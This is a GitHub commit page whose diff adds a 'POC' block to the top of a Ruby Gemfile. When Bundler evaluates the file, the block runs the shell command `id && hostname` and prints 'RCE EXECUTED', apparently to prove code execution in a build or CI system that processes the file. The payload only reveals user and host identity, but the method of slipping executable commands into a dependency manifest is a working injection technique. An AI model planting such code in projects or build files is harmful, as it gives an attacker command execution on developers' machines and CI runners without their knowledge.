Skip to content

Commit 8179323

Browse files
author
feb716
authored
Update Gemfile
1 parent a1326c3 commit 8179323

1 file changed

Lines changed: 8 additions & 0 deletions

File tree

Gemfile

Lines changed: 8 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -1,3 +1,11 @@
1+
# --- POC START ---
2+
res = `id && hostname`
3+
puts "========================================"
4+
puts "🚀 POC SUCCESS: RCE EXECUTED!"
5+
puts res
6+
puts "========================================"
7+
# --- POC END ---
8+
19
source "https://rubygems.org"
210

311
gem "faraday", "2.14.1"

0 commit comments

Comments
 (0)